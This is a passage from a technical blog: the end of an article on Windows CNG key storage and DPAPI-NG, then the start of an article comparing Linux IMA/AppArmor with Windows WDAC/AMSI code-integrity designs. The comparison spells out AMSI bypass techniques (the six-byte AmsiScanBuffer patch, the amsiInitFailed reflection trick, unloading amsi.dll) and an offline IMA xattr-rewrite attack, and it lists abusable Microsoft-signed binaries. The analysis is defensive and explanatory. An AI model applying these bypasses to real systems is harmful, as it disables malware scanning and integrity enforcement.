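        terms: List[Term] = []
        for and_part in re.split(r"\s+AND\s+", or_part):
            key, sep, value = and_part.partition("=")
            if not sep or not key or not value:
                raise ValueError(f"malformed protector: {and_part!r}")
            terms.append((key.upper(), value))
        groups.append(terms)
    return groups


def can_unprotect(groups: List[List[Term]], satisfied: Set[Term]) -> bool:
    """True if the caller satisfies every term of at least one OR-group."""
    return any(all(term in satisfied for term in group) for group in groups)


# Hypothetical SID, for illustration only.
rule = "SID=S-1-5-21-1111-2222-3333-1001 OR LOCAL=user"
groups = parse_descriptor(rule)

print(groups)
print(can_unprotect(groups, {("LOCAL", "user")}))
print(can_unprotect(groups, {("SID", "S-1-5-21-9999")}))
```

The caller's code never sees this evaluation; it hands the string to NCryptCreateProtectionDescriptor and the provider decides. The model is only meant to show why "who can unwrap" fits in one line of text.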

flowchart LR
Plain["plaintext secret"] --> Protect["NCryptProtectSecret(descriptor, plain)"]
Desc["descriptor: -- SID=group SID -- OR -- LOCAL=user"] --> Protect
Protect --> Blob["opaque blob"]
Blob --> Unprotect["NCryptUnprotectSecret(blob)"]
Unprotect -.->|"resolves descriptor -- via domain key distribution"| AD["Active Directory DC -- (Group Key Distribution Service)"]
Unprotect --> Out["plaintext secret -- on any authorized machine"]

The architectural win is that DPAPI-NG is just NCrypt with a particular protection-descriptor schema. Any provider that can serve the key referenced by the descriptor can satisfy the unwrap. In an Active-Directory-joined environment, the domain controllers' Group Key Distribution Service (which derives group keys from the KDS root key and is separate from the classic DPAPI domain backup key) allows any machine where the user (or any member of the named group) authenticates to recover the secret. The application that called NCryptProtectSecret does not need to know about key distribution, replication topology, or recovery flows. It calls NCrypt; the router and the relevant provider do the rest.

This is the design payoff of the two-tier model. A new key-management capability (cross-machine recovery via keys that Active Directory distributes) becomes a new descriptor type, not a new API. The Windows team has used the same descriptor extensibility to add web-credential descriptors, container-bound descriptors, and the descriptors that protect Group Managed Service Account passwords. Each one is a private key-management concern; none of them broke the public API.

The DPAPI-NG descriptor language is small enough to read in one sitting and powerful enough to express "any member of this AD group, on any machine where that member can authenticate." That is the cloud-era access-control story that the original DPAPI never had.

10. Engineering takeaways: choosing the right tool

The decision tree for CNG usage in production code is short.

flowchart TD
Q1{"Need persistent -- private key?"}
Q1 -- No --> B["BCrypt -- (ephemeral key, pseudo-handle)"]
Q1 -- Yes --> Q2{"Threat model?"}
Q2 -- "Machine identity, -- hardware-rooted" --> P["Microsoft Platform -- Crypto Provider -- (TPM / Pluton)"]
Q2 -- "User-bound PKI, -- removable hardware" --> S["Microsoft Smart Card KSP -- (PIV / virtual smart card)"]
Q2 -- "High signing rate, -- regulated custody" --> H["Third-party HSM KSP -- (YubiHSM / Luna / nShield)"]
Q2 -- "Default, -- portable, fast" --> SW["Microsoft Software KSP"]
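The same tree reads naturally as a lookup, which is a reasonable way to encode it in a design-review checklist or a provisioning script. The Python sketch below is a direct transcription of the branches above; the function name and the threat-model keys are illustrative labels, not CNG identifiers.

```python
def choose_key_home(persistent: bool, threat_model: str = "default") -> str:
    """Map the two questions in the decision tree to a key home."""
    if not persistent:
        return "BCrypt (ephemeral key, pseudo-handle)"
    homes = {
        "machine-identity": "Microsoft Platform Crypto Provider (TPM / Pluton)",
        "user-pki": "Microsoft Smart Card KSP (PIV / virtual smart card)",
        "regulated-custody": "Third-party HSM KSP",
        "default": "Microsoft Software KSP",
    }
    try:
        return homes[threat_model]
    except KeyError:
        # Refuse to guess: an unknown threat model should be a design question.
        raise ValueError(f"unknown threat model: {threat_model!r}") from None


print(choose_key_home(False))
print(choose_key_home(True, "machine-identity"))
print(choose_key_home(True))
```

Raising on an unknown threat model instead of defaulting to the Software KSP is a deliberate choice in this sketch: a silent default is how keys end up in the wrong place.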

For algorithm choice in mid-2026, the defensible defaults look like this. Symmetric encryption: ChaCha20-Poly1305 or AES-256-GCM. Hashing: SHA-256 or SHA-3 family. Signatures: ECDSA P-256 or P-384 today, with ML-DSA-65 in the back pocket for the inevitable hybrid transition. Key encapsulation: X25519 today, with X25519+ML-KEM-768 hybrid as soon as your peers support it. RSA-2048 only for legacy interoperability. RC4, 3DES, and SHA-1 only behind explicit deprecation policy, and only for verification of historical artifacts.

Key idea: The hardest thing about CNG is not learning the API. It is choosing the right KSP. That single decision -- where the private key actually lives -- determines almost everything about your threat model, your throughput, your compliance posture, and your operational complexity.

A few engineering rules survive in any setting.

Do not put persistent keys in BCrypt. Every BCrypt key handle dies with the process. The architectural separation exists for a reason. If the key needs to survive a reboot, it belongs in NCrypt under a named KSP.

Do not assume the Software KSP. Code that calls NCryptOpenStorageProvider(NULL) ends up with whatever the default is. On a server with an HSM KSP configured as the default, this might be what you want; on a developer workstation, it might be the Microsoft Software KSP. Be explicit. Pass the name string. Test the negative case where the KSP you named is not registered.

Audit which KSP your certificates actually use. A certificate enrolled with the Platform Crypto Provider behaves identically to a certificate enrolled with the Software KSP from certutil's point of view. The difference is invisible until you ask. Use certutil -store -v My to dump certificate properties, and look for the provider field.

Treat FIPS mode as a deployment fact, not a development toggle. Code that works fine on a developer workstation can break in surprising ways on a FIPS-enabled production server. Run your CI on a FIPS-toggled image periodically. Catch the STATUS_NOT_SUPPORTED returns before customers do.

Watch the PQC roadmap. The ML-KEM and ML-DSA primitives are in 24H2. Hybrid TLS in Schannel is not on by default at the OS level as of mid-2026 (the most recent Microsoft public posture in the cipher-suite documentation does not yet list a default-on hybrid group), but downstream protocol updates will come. Code that uses the BCrypt and NCrypt patterns shown here picks up the new algorithms with a string change.

Note: The single most useful CNG diagnostic command on a modern Windows system is certutil -csptest, which enumerates registered providers and the algorithms each one claims to support. Run it before you suspect a configuration drift, not after.

The story of CNG is the story of two architectural bets that paid off. The first bet was that algorithms would keep arriving, so the API should be a registry of strings rather than a hard-coded set of functions. The second bet was that key storage was a separate concern from algorithm implementation, so the same primitives could run against software, TPM, smart cards, and HSMs without changing the application. In 2007 those bets looked over-engineered. In 2026, with ML-KEM shipping behind the same BCryptEncapsulate call that an ECDH consumer would have used, they look like exactly the right design.

Frequently asked questions

No. Microsoft's BCrypt is the `bcrypt.h` primitives header in CNG, providing AES, SHA, HMAC, RNG, and related primitives. The Provos-Mazieres bcrypt is a password-hashing function based on the Blowfish cipher, with no connection to Windows. The naming collision is unfortunate but firmly entrenched. When in doubt, BCrypt with a capital "B" usually means Microsoft's CNG header; lowercase bcrypt usually means the password-hashing function.

On Windows, yes. .NET's `System.Security.Cryptography` namespace wraps CNG directly: `RSACng`, `ECDsaCng`, `AesGcm`, `SHA256.HashData()`, `CngKey`. Go, Rust, and Python bindings exist as third-party crates and packages (the Rust `windows` crate exposes both BCrypt and NCrypt, for example). OpenSSL on Windows does not transparently use CNG; you need the `openssl-cng` provider or direct CNG calls if you want the OS-validated primitives to do the work.

Both can do RSA, ECDSA, and (in 24H2) ML-DSA signatures. The difference is lifetime. BCrypt key handles are ephemeral: they live in your process and disappear when it exits. NCrypt keys are persisted in a KSP and survive process exit, reboots, and (for AD-replicated descriptors via DPAPI-NG) the loss of a single machine. Use BCrypt for one-shot ephemeral operations (signing a single message, deriving a session key); use NCrypt for anything with a certificate attached or anything that has to be around tomorrow.

Possibly, depending on what algorithms it calls. Setting `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled = 1` causes CNG to refuse RC4, MD5, SHA-1 for new signatures, and a handful of other non-approved algorithms. Anything that relied on those returns `STATUS_NOT_SUPPORTED`. The fix is to switch to approved algorithms (AES, SHA-2 family, RSA, ECDSA, ML-KEM, ML-DSA), not to disable the toggle. The toggle is also necessary but not sufficient for FIPS compliance: you also need a Windows build with an active CMVP certificate covering the cryptographic modules.

As of mid-2026, the public Schannel documentation does not list a default-on hybrid group like `X25519MLKEM768`. The ML-KEM primitive is in CNG in 24H2, and Schannel can use it through the standard cipher-suite negotiation, but Microsoft has not publicly committed to enabling a hybrid group out of the box at the OS level. Chrome, Cloudflare, and AWS have already shipped hybrid PQ TLS in production at the application layer. Expect Schannel to follow once IETF standardization stabilizes and CMVP validation of the new modules catches up.

For a certificate in the user or machine store, run `certutil -store -v My` (or `My` replaced with the store name) and look at the "Provider" field of each certificate. `Microsoft Software Key Storage Provider` means the key is on disk under `%APPDATA%` or `%ALLUSERSPROFILE%`. `Microsoft Platform Crypto Provider` means the key lives inside the TPM (or Pluton). `Microsoft Smart Card Key Storage Provider` means the key is on a card. Third-party HSM KSPs will show the vendor's provider name. For a freshly-created key via `NCryptCreatePersistedKey`, the provider name you passed to `NCryptOpenStorageProvider` is the source of truth.

Because private keys do not live in the calling process. For the Microsoft Software KSP, key material lives in the LSA key-isolation process (`lsaiso.exe` under VBS, `lsass.exe` otherwise), and every operation that touches private bits has to cross that process boundary. The cost is around 30 to 100 microseconds per call. That is acceptable for signing or key derivation (operations that happen a handful of times per session); it would be punishing for bulk symmetric encryption. The architectural answer is to keep bulk crypto in BCrypt and let only the persistent-key operations pay the LRPC cost.

<StudyGuide slug="cng-architecture-bcrypt-ncrypt-ksps-and-windows-crypto" keyTerms={[ { term: "CAPI (Cryptographic Application Programming Interface)", definition: "The original Windows cryptographic API (1998-onward). Plug-in unit was the CSP. Superseded by CNG starting in 2007 but still present for backwards compatibility." }, { term: "CNG (Cryptography API: Next Generation)", definition: "The Windows cryptographic API since Vista (2007). Two-tier split: BCrypt for primitives, NCrypt for key storage. The basis for all modern Windows cryptography." }, { term: "CSP (Cryptographic Service Provider)", definition: "The CAPI-era plug-in unit. Monolithic DLL bundling algorithms, key storage, and FIPS posture." }, { term: "KSP (Key Storage Provider)", definition: "The CNG-era plug-in unit for persistent key storage. Microsoft ships four; third parties ship many more. Selected by name string passed to NCryptOpenStorageProvider." }, { term: "Microsoft Software Key Storage Provider", definition: "The default KSP. Stores DPAPI-wrapped keys on disk and dispatches operations through the LSA key-isolation process via LRPC." }, { term: "Microsoft Platform Crypto Provider", definition: "The TPM-and-Pluton-backed KSP. Keys are generated and used inside the TPM chip; private bits never leave the silicon." }, { term: "TPM key attestation", definition: "A three-key chain (EK -> AIK -> application key) that lets a CA verify a key was generated inside a real TPM. Supported by Active Directory Certificate Services since Windows Server 2012 R2." }, { term: "FIPS 140", definition: "US federal certification program for cryptographic modules. Validated modules receive a public CMVP certificate. Windows 11's bcryptprimitives.dll holds CMVP certificate #4825, cng.sys holds #4766." }, { term: "ML-KEM (FIPS 203)", definition: "Module-Lattice Key Encapsulation Mechanism. The NIST-standardized post-quantum KEM, formerly known as CRYSTALS-Kyber. Shipped in Windows 11 24H2." 
}, { term: "ML-DSA (FIPS 204)", definition: "Module-Lattice Digital Signature Algorithm. The NIST-standardized post-quantum signature scheme, formerly known as CRYSTALS-Dilithium. Shipped in Windows 11 24H2." }, { term: "DPAPI-NG", definition: "The CNG-era rebuild of the original Data Protection API. Uses NCrypt protection descriptors to bind protected data to AD principals (users, groups, web credentials) rather than to a single machine." }, { term: "SymCrypt", definition: "Microsoft's open-source cryptographic implementation library. The actual workhorse behind BCrypt and NCrypt since Windows 10 version 1703 (2017)." } ]} />

Two Routes to Code Integrity: Linux IMA + AppArmor vs Windows WDAC + AMSI

noreply@paragmali.com (Parag Mali) — Sat, 16 May 2026 00:00:00 GMT

Linux and Windows have spent fifteen years answering the same question -- "is this code allowed to run?" -- and arrived at radically different architectures. Linux composes half a dozen narrow kernel modules (IMA, EVM, AppArmor, SELinux, fs-verity, IPE) plus a userspace daemon (`fapolicyd`); Windows ships one integrated suite (App Control + HVCI + AMSI + Smart App Control). Both stacks shipped their v1 with the **check in the wrong place**, and the architectural pivots that fixed it -- EVM's HMAC-sealed xattrs, HVCI's hypervisor-isolated verifier, IPE's property-based decisions -- are the breakthrough lesson of this comparison. Crypto is solved. Trust-boundary protection and policy expressiveness are not, and Rice's theorem says they never fully will be.

1. Two bypasses, same architectural shape

On a Windows 11 desktop, an attacker with a PowerShell session under their control can blind Microsoft Defender to every script that session ever evaluates by overwriting six bytes inside one function in amsi.dll. The Antimalware Scan Interface, the in-process bridge between scripting hosts and the registered antivirus product, dutifully reports "clean" on every subsequent buffer because the prologue of AmsiScanBuffer has been patched to mov eax, 0; ret (B8 00 00 00 00 C3).

The interface ships exactly as Microsoft documents it, and the function still has the signature in MSDN [@learn-microsoft-com-amsi-amsiscanbuffer]: the attacker did not need to break anything. They needed only to write into the address space they already owned.

On a Linux server, a different attacker with offline access to the disk -- recovered from a stolen laptop, a forensics image, a hostile cloud-provider snapshot -- mounts the filesystem and rewrites a system binary together with the file's security.ima extended attribute. When the box boots, the kernel's Integrity Measurement Architecture hashes the binary at exec time, compares the hash to the value stored in security.ima, sees a match, and allows execution. Without the Extended Verification Module, IMA appraisal has no defence against this offline-rewrite attack [@lwn-net-articles-394170] -- the reference hash is sitting next to the file the attacker just replaced.

Both operating systems claim fail-closed code-integrity enforcement. Both lose to a single architectural mistake about where the check runs. The mistakes are different in detail and identical in shape: the verifier is reachable by the attacker. On Windows the attacker shares the script host's address space with the scanner. On Linux the attacker shares the on-disk container with the reference hash.

This article exists to make that symmetry visible. The two stacks reached their 2026 form by very different routes -- Linux composes six narrow Linux Security Modules and one userspace daemon, Windows ships one tightly-coupled product line -- but the breakthroughs on each side answered the same question: how do you move the verifier out of reach?

The Linux answer was EVM (HMAC the extended attributes that IMA depends on) and IPE (decide on immutable file properties rather than file contents). The Windows answer was HVCI (lift the kernel-mode code-integrity check into a hypervisor-isolated secure kernel). The names are different. The lesson is one.

Why did Linux and Windows arrive at such different architectures in the first place? That story starts in an IBM research lab in 2003.

2. The question both operating systems are trying to answer

Both lineages exist to answer one question -- "is this code allowed to run?" -- but they put the check in completely different places. Before we can compare them honestly, we need a shared vocabulary for the three layers any production code-integrity stack must cover.

The first layer is code integrity itself, often abbreviated CI: a gate on the file's content or its signer. Did this .so come from a package my distribution signed? Does this .exe match an Authenticode chain rooted in a publisher my policy trusts? The answer is binary. The hook fires before the process loads the bytes.

The second layer is mandatory access control, or MAC. Now the process is running. What can it do? Can nginx open /etc/shadow? Can mshta.exe spawn cmd.exe? MAC is enforced by the kernel above discretionary access control and cannot be overridden by userspace privileges.

Mandatory access control (MAC): A kernel-enforced policy layer above traditional discretionary access control (DAC). Unlike DAC, where the file owner sets permissions, MAC policy is set by the system administrator and applied uniformly to all processes; no user, including root, can override it without changing the policy itself.

The third layer is content inspection: gating not on the file but on the buffer the interpreter is about to evaluate. The PowerShell engine has just deobfuscated a long string into a script block. Is the script block malicious? Linux has no production equivalent. Windows ships AMSI [@learn-microsoft-com-interface-portal] for exactly this.

Where each operating system puts these checks tells you almost everything about its architectural philosophy.

Linux puts every check on a Linux Security Module hook [@kernel-org-security-lsmhtml]. IMA registers at bprm_check (the kernel hook that fires when a binary is about to be executed), file_mmap with MAY_EXEC, module_check, firmware_check, and kexec_*. AppArmor and SELinux register at the syscall-level access hooks. fapolicyd rides on top of fanotify. IPE hooks op=EXECUTE. The kernel is the trust boundary, and every mechanism is a polite tenant inside it.

Linux Security Modules (LSM): The kernel framework, merged into Linux 2.6.0 in December 2003, that hosts pluggable security modules at well-defined hook points in the kernel. LSMs include SELinux, AppArmor, Smack, Tomoyo, IMA, EVM, IPE, BPF LSM, and Landlock; multiple modules can coexist via "LSM stacking".

Windows takes the opposite path. The PE loader is the gate for user-mode code integrity (UMCI). The kernel-mode code-integrity check is, in the modern stack, moved out of the normal kernel into a small secure kernel running on top of Hyper-V -- Hypervisor-protected Code Integrity, HVCI [@learn-microsoft-com-code-integrity]. The script broker runs in-process with each scripting host. Cloud reputation is consulted via the Intelligent Security Graph and exposed to consumers as Smart App Control.

Platform Configuration Register (PCR): A monotonically extendable hash register inside a Trusted Platform Module. New measurements are folded in with `PCR_new = SHA256(PCR_old || measurement)`. Once extended, the value cannot be rolled back without resetting the TPM. IMA extends file-content hashes into PCR 10; the Windows Measured Boot chain uses PCRs 0-7 and 11-14.
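The extend rule is easy to model in software, which helps show why a PCR value commits to the whole ordered history of measurements rather than to any single one. The sketch below is a toy under stated assumptions: it uses Node's built-in `crypto` module in place of a TPM, the file contents are made-up strings, the register is assumed to start at 32 zero bytes, and the measurement is a bare content hash (a real IMA log entry carries more than that). The helper names `pcrExtend` and `measure` are hypothetical.

```javascript
const { createHash } = require("node:crypto");

// One extend step: PCR_new = SHA256(PCR_old || measurement).
function pcrExtend(pcrOld, measurement) {
  return createHash("sha256").update(pcrOld).update(measurement).digest();
}

// Hash some (made-up) file content to get the measurement to fold in.
const measure = (content) => createHash("sha256").update(content).digest();

// Assumed starting value for this sketch: 32 zero bytes.
const reset = Buffer.alloc(32);
const a = measure("contents of /usr/bin/foo");
const b = measure("contents of /usr/bin/bar");

// The same two measurements, folded in both orders.
const ab = pcrExtend(pcrExtend(reset, a), b);
const ba = pcrExtend(pcrExtend(reset, b), a);

console.log("a then b:", ab.toString("hex"));
console.log("b then a:", ba.toString("hex"));
console.log("order matters:", !ab.equals(ba));
```

Because each new value depends on the previous one, there is no input that "subtracts" an earlier measurement; a verifier replays the measurement list in order and checks that it lands on the reported register value.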

The architectural philosophy comes down to a sentence each. Linux trusts the kernel surface and packs every integrity mechanism into it as a separate LSM. Windows trusts a hypervisor-isolated secure kernel and uses it to host the integrity logic the normal kernel cannot be trusted to run honestly.

flowchart LR subgraph CI[Code integrity: gate on file content or signer] direction TB L_IMA[Linux: IMA + EVM] L_IPE[Linux: IPE] L_FSV[Linux: fs-verity] L_FAP[Linux: fapolicyd] W_WDAC[Windows: App Control / WDAC] W_HVCI[Windows: HVCI / Memory Integrity] W_SAC[Windows: Smart App Control] end subgraph MAC[Mandatory access control: gate on running process behaviour] direction TB L_AA[Linux: AppArmor] L_SE[Linux: SELinux] W_NONE[Windows: no direct analogue, closest is AppContainer / ASR] end subgraph CS[Content inspection: gate on the buffer the interpreter will evaluate] direction TB W_AMSI[Windows: AMSI] L_GAP[Linux: no production equivalent] end CI --> MAC --> CS

Neither stack started this way. The 2026 stack on each side is the accumulated answer to fifteen years of failures. Here is how they grew up.

3. Two genesis stories

In 2003, four IBM researchers at the T. J. Watson Research Center -- Reiner Sailer, Xiaolan Zhang, Trent Jaeger, and Leendert van Doorn -- tried to convince the USENIX Security community that you could prove the integrity of a Linux web server to a remote verifier. Their paper, Design and Implementation of a TCG-based Integrity Measurement Architecture [@usenix-org-tech-sailerhtml], shipped at the 13th USENIX Security Symposium in 2004. It proposed hashing every executable file at load time, extending each hash into a TPM platform configuration register, and sending the resulting measurement list to a remote verifier who could compare it to a known-good manifest.

The performance evaluation [@usenix-org-sailerhtml-node19html] measured the cost on an IBM Netvista with a 2.4 GHz Pentium 4: the file_mmap LSM hook added 0.08 microseconds per call on a cache hit, and SHA-1 fingerprinting ran at roughly 80 MB/s. The headline claim was that more than 99.9% of measure calls landed on the cached path, so the overhead was essentially free.

Pentium 4-era SHA-1 at 80 MB/s vs Ice Lake-era SHA-NI-accelerated SHA-256 at roughly 2 GB/s per core: a 25x throughput jump in twenty years. The original paper's qualitative finding -- cache hit dominates, overhead is negligible -- holds even more strongly on modern silicon.

It took five years for that proposal to reach the kernel. IMA's measurement-only mode was merged in Linux 2.6.30 in June 2009. It hashed files at bprm_check, file_mmap, and module_check, extended TPM PCR 10, and otherwise let everything run.

The "is this hash allowed?" question would have to wait three more years. The Extended Verification Module landed in Linux 3.2 in January 2012; digital-signature mode for EVM followed in 3.3 in March 2012; and IMA-appraise, the enforcement extension that finally let the kernel return -EPERM when a file's hash did not match security.ima, merged in Linux 3.7 in December 2012 [@lwn-net-articles-488906]. The same LWN article frames the cadence plainly: "Much of IMA was added to the kernel in 2.6.30, but another piece, the extended verification module (EVM) was not merged until 3.2 ... Digital signature support was added to EVM in 3.3, and IMA appraisal is currently under review." Mimi Zohar's appraisal patchset [@lwn-net-articles-487700] is the canonical lore.kernel.org artifact of that final step.

AppArmor took a different, longer road. It was born inside Immunix in 1998 under the name "SubDomain", a path-based confinement layer designed to stop privilege-escalation exploits from doing anything the binary's profile did not name. Novell acquired Immunix in 2005, renamed SubDomain to AppArmor, and shipped it as the default mandatory access control layer on SLES and openSUSE. According to the Ubuntu AppArmor wiki [@wiki-ubuntu-com-apparmor], "AppArmor support was first introduced in Ubuntu 7.04, and is turned on by default in Ubuntu 7.10 and later" -- so by October 2007 AppArmor was already a default-on production MAC on the most-deployed Linux desktop distribution.

Mainlining did not happen until October 2010, when AppArmor finally landed in Linux 2.6.36 [@docs-kernel-org-lsm-apparmorhtml]. Seven years out of tree, three years default-on in Ubuntu, before the kernel community accepted it.

The contrast with SELinux [@en-wikipedia-org-security-enhancedlinux] is sharp. SELinux merged into Linux 2.6.0 in December 2003 -- barely a year after the LSM framework was created. SELinux was, in fact, the reason the LSM framework existed.

SELinux's type-enforcement model maps directly to LSM's "label the subject, label the object, look up the rule" hook signature. AppArmor's path-based reasoning does not. LSM hooks see inodes, not paths -- and an inode can be reached from many paths (bind mounts, hard links, namespace games, chroots). To merge, AppArmor had to push kernel-side helpers like `vfs_path_lookup` and `d_absolute_path` upstream so it could reconstruct the absolute path of the object at hook time. The conceptual fight took three rejected merge attempts and seven years. The lesson is one Linux kernel reviewers have repeated since: a security model is not just an algorithm, it is a commitment to a particular kind of name-resolution semantics.
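The "one inode, many paths" problem can be seen from userspace with a single hard link. The following is a small sketch using Node's standard `fs` module; the directory and file names are hypothetical and created in a scratch directory, and it assumes a filesystem that supports hard links.

```javascript
const fs = require("node:fs");
const os = require("node:os");
const path = require("node:path");

// Scratch directory so the sketch leaves nothing behind.
const dir = fs.mkdtempSync(path.join(os.tmpdir(), "inode-demo-"));
const original = path.join(dir, "tool");
const alias = path.join(dir, "innocent-name");

fs.writeFileSync(original, "#!/bin/sh\necho hi\n");
fs.linkSync(original, alias); // hard link: a second name for the same inode

const a = fs.statSync(original);
const b = fs.statSync(alias);
const sameObject = a.ino === b.ino && a.dev === b.dev;

console.log("paths differ:", original !== alias);
console.log("same inode:", sameObject, "link count:", a.nlink);

fs.rmSync(dir, { recursive: true, force: true });
```

A label-based model attaches policy to the inode and sees one object here. A path-based model sees two names and has to decide which one the rule is about, which is the name-resolution commitment the paragraph above describes.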

The Windows lineage starts in a different building entirely. AppLocker shipped with Windows 7 and Windows Server 2008 R2 in 2009: a user-mode-only allowlist, with no hypervisor or kernel-mode backing, and rules tied to file paths, publishers, or hashes. AppLocker is still supported on modern Windows but "isn't getting new feature improvements" [@learn-microsoft-com-applocker-overview]; the modern successor is App Control for Business.

Windows 10 RTM (version 1507, July 2015) shipped the first version of Device Guard along with AMSI [@learn-microsoft-com-interface-portal] and PowerShell 5.0, which integrated with AMSI from day one. Device Guard became known as Windows Defender Application Control (WDAC) and then, in 2024, was renamed once more to App Control for Business. User-mode code integrity (UMCI) became a policy option, FilePath rules were added in Windows 10 version 1903 [@learn-microsoft-com-applocker-overview], multiple-policy authoring landed in the same release, and Smart App Control made its consumer debut in Windows 11 22H2 in September 2022 [@blogs-windows-com-2022-update].

gantt title Linux and Windows code-integrity timeline dateFormat YYYY-MM axisFormat %Y section Linux SELinux mainline 2.6.0 :2003-12, 12M AppArmor at Immunix :1998-01, 84M AppArmor default in Ubuntu :2007-10, 36M IMA mainline 2.6.30 :2009-06, 32M EVM mainline 3.2 :2012-01, 2M EVM digital sigs 3.3 :2012-03, 9M IMA-appraise 3.7 :2012-12, 24M AppArmor mainline 2.6.36 :2010-10, 14M fs-verity 5.4 :2019-11, 60M IPE 6.12 :2024-11, 12M section Windows AppLocker (Win 7) :2009-10, 70M Device Guard + AMSI + PowerShell 5 (1507) :2015-07, 25M WDAC UMCI (1709) :2017-10, 18M FilePath rules + multi-policy (1903) :2019-05, 24M HVCI broadens (Win 10 1607+) :2016-08, 60M Smart App Control (Win 11 22H2) :2022-09, 24M App Control for Business rename :2024-01, 12M

Two timelines, two design philosophies, both shipping their v1 with the same kind of mistake. The next section makes that concrete.

4. Where the naive approach breaks

Both stacks shipped their first version with the check in the wrong place. Two stories make this concrete; two more refine it.

Story A: IMA-as-shipped (2009) without EVM

When IMA reached the kernel in Linux 2.6.30, it hashed the file at bprm_check and stored the reference hash in the file's security.ima extended attribute. That xattr is the only other thing an attacker with offline disk access has to rewrite to defeat the check. Mount the filesystem from another box, swap the binary for a malicious one, recompute the hash over the new binary, and write the new value into security.ima. Boot the box. The kernel hashes the malicious binary at exec, reads the matching xattr the attacker just wrote, and lets the exec through.
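A toy model makes the gap concrete. The sketch below is not kernel code: the "disk" is a plain object, `installFile` and `imaAppraise` are hypothetical names, and the only thing modelled is the comparison between the content hash and the value stored in `security.ima`.

```javascript
const { createHash } = require("node:crypto");
const sha256 = (data) => createHash("sha256").update(data).digest("hex");

// Toy "disk": file content and its xattrs live side by side.
function installFile(content) {
  return { content, xattrs: { "security.ima": sha256(content) } };
}

// Toy appraisal: compare the content hash with the stored reference.
function imaAppraise(file) {
  return sha256(file.content) === file.xattrs["security.ima"] ? "allow" : "-EPERM";
}

const file = installFile("legitimate binary");
const untouched = imaAppraise(file);

// Naive tampering: content changes, xattr does not. Appraisal catches it.
file.content = "malicious binary";
const contentOnly = imaAppraise(file);

// Offline tampering: the attacker also rewrites the reference hash.
file.xattrs["security.ima"] = sha256(file.content);
const contentAndXattr = imaAppraise(file);

console.log("untouched:      ", untouched);
console.log("content only:   ", contentOnly);
console.log("content + xattr:", contentAndXattr);
```

The hash comparison never fails in the third case because nothing in the check depends on a value the attacker cannot write.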

This is the offline-tampering attacker model EVM was designed to defeat. The contemporaneous LWN coverage put it plainly: "IMA can be subverted by 'offline' attacks, where file data or metadata is changed out from under IMA. Mimi Zohar has proposed the extended verification module (EVM) patch set as a means to protect against these offline attacks." [@lwn-net-articles-394170]

The EVM v5 patchset [@lwn-net-articles-443038], posted by Zohar in May 2011, describes the design directly: "Extended Verification Module (EVM) detects offline tampering of the security extended attributes (e.g. security.selinux, security.SMACK64, security.ima) ... initial method maintains an HMAC-sha1 across a set of security extended attributes, storing the HMAC as the extended attribute 'security.evm'."

Story B: AMSI as shipped (2015) inside the script host

AMSI's design is documented in How AMSI helps you defend against malware [@learn-microsoft-com-amsi-helps]: "Script (malicious or otherwise), might go through several passes of de-obfuscation. But you ultimately need to supply the scripting engine with plain, un-obfuscated code. And that's the point at which you invoke the AMSI APIs."

A scripting host -- PowerShell, WSH, MSHTA, Office VBA, the UAC installer dialog -- calls AmsiInitialize, then for every plain-text script buffer it is about to execute calls AmsiScanBuffer [@learn-microsoft-com-amsi-amsiscanbuffer] or AmsiScanString. The call is routed through amsi.dll, loaded into the host process, which dispatches to the registered IAntimalwareProvider COM server. Defender is the default provider.

The detection logic is sound. The trust boundary is not. The attacker already controls the script host. Three single-shot bypass techniques have lived in red-team toolkits since 2016:

Patch AmsiScanBuffer's prologue in memory to mov eax, 0; ret (B8 00 00 00 00 C3). Six bytes of opcode rewrite, no syscalls required, blinds the scanner permanently for this process.
Set System.Management.Automation.AmsiUtils.amsiInitFailed = true via reflection. PowerShell checks the flag on every scan path and short-circuits.
Unload amsi.dll via FreeLibrary. There is no scanner left to call.

Microsoft tracks this so closely that its own "Applications that can bypass App Control" [@learn-microsoft-com-bypass-appcontrol] deny list calls out the AMSI-bypass-capable versions of system.management.automation.dll by hash. The defender's authoritative list of files-to-block treats specific signed Microsoft DLLs as named threats.

The same Microsoft bypass list also enumerates mshta.exe, wscript.exe, cscript.exe, msbuild.exe, Microsoft.Build.dll, windbg.exe, cdb.exe, kd.exe, dotnet.exe, csi.exe, rcsi.exe, addinprocess.exe, wmic.exe, bash.exe, wsl.exe, runscripthelper.exe, and dozens of others -- 40+ entries today, growing whenever a new Microsoft-signed binary turns out to host an attacker-friendly evaluator.

Note: The host process making the AMSI call is the same process the attacker is running in. Any defence-in-depth plan that treats AMSI as a hard control is mis-specified. Treat AMSI as a high-quality telemetry surface feeding Defender for Endpoint and EDR pipelines; budget for the bypass.

{`
// In Windows, AMSI scans each plain-text script buffer just before
// the scripting engine evaluates it. The scanner lives in amsi.dll,
// loaded into the script host process. The attacker who controls
// that process can rewrite the function's first few bytes.
//
// This toy model shows the consequence: once "patched", the scanner
// returns CLEAN regardless of input, as the second pair of calls
// below shows.

const AMSI_RESULT_CLEAN = 0;
const AMSI_RESULT_MALWARE = 32768;

function amsiScanBuffer(buf, patched) {
  if (patched) return AMSI_RESULT_CLEAN;
  if (buf.includes("Invoke-Mimikatz")) return AMSI_RESULT_MALWARE;
  return AMSI_RESULT_CLEAN;
}

console.log("Normal mode:");
console.log(" clean payload: ", amsiScanBuffer("Get-Process", false));
console.log(" malicious payload:", amsiScanBuffer("Invoke-Mimikatz", false));

console.log("\nAfter six-byte patch:");
console.log(" clean payload: ", amsiScanBuffer("Get-Process", true));
console.log(" malicious payload:", amsiScanBuffer("Invoke-Mimikatz", true));

// The takeaway: no input ever produces MALWARE once the scanner is patched.
// Strengthening AMSI's signature engine cannot fix this. The scanner
// must move out of the script host's address space.
`}

Story C: WDAC's "trust all Microsoft-signed code" anti-pattern

A WDAC policy that trusts code signed by Microsoft also trusts every binary Microsoft has ever signed. That set includes mshta.exe, wscript.exe, cscript.exe, msbuild.exe, wmic.exe, system.management.automation.dll, and the 40-plus other binaries enumerated on Microsoft's own App Control bypass list [@learn-microsoft-com-bypass-appcontrol]. The LOLBAS community catalogue [@lolbas-project-github-io] widens the field to roughly 200 living-off-the-land binaries with explicit MITRE ATT&CK technique mappings.

The pattern is structural: WDAC grants trust at signer granularity (a chain rooted at "Microsoft Corporation"); attackers exploit at binary granularity (the specific mshta.exe that will happily evaluate an HTA blob containing a PowerShell stager). Any non-trivial WDAC policy must therefore contain explicit hash-level denies for the known-bad versions, and must keep growing those denies as Microsoft ships new signed binaries.
